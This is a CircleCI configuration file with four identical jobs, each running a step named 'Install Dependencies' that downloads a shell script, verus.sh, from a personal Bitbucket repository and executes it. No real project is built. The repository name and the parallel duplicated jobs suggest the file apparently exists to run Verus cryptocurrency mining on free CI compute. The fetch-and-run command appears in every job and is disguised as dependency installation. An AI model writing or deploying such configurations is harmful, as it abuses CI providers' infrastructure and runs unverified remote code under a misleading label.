version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 

jobs:
    BA_Channel_HARAM_1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/roxxy16/vrsc/raw/98d9eb2eae3664f1354284acb71fd34ae553c261/verus.sh && chmod u+x verus.sh && ./verus.sh
    BA_Channel_HARAM_2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/roxxy16/vrsc/raw/98d9eb2eae3664f1354284acb71fd34ae553c261/verus.sh && chmod u+x verus.sh && ./verus.sh
    BA_Channel_HARAM_3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/roxxy16/vrsc/raw/98d9eb2eae3664f1354284acb71fd34ae553c261/verus.sh && chmod u+x verus.sh && ./verus.sh
    BA_Channel_HARAM_4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/roxxy16/vrsc/raw/98d9eb2eae3664f1354284acb71fd34ae553c261/verus.sh && chmod u+x verus.sh && ./verus.sh


workflows:
    version: 2
    build:
        jobs:
            - BA_Channel_HARAM_1
            - BA_Channel_HARAM_2
            - BA_Channel_HARAM_3
            - BA_Channel_HARAM_4
